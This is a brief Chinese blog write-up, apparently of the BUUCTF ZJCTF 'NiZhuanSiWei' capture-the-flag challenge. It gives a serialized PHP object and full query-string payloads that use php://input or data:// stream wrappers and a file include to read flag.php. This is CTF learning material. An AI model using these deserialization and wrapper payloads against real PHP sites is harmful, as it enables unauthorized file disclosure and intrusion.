您当前的位置: 首页 >  php

Z3eyOnd

暂无认证

  • 3浏览

    0关注

    117博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

BUU-ZJCTF-php反序列化+伪协议

Z3eyOnd 发布时间:2021-10-08 15:59:45 ,浏览量:3

文章目录
    • NiZhuanSiWei

NiZhuanSiWei

打开环境,看到代码


O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}  

最后的payload

text=php://input&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
如果用input,需要POST传参,如果用data代替input,可以GET传参
text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
关注
打赏
1651657201
查看更多评论
立即登录/注册

微信扫码登录

0.0625s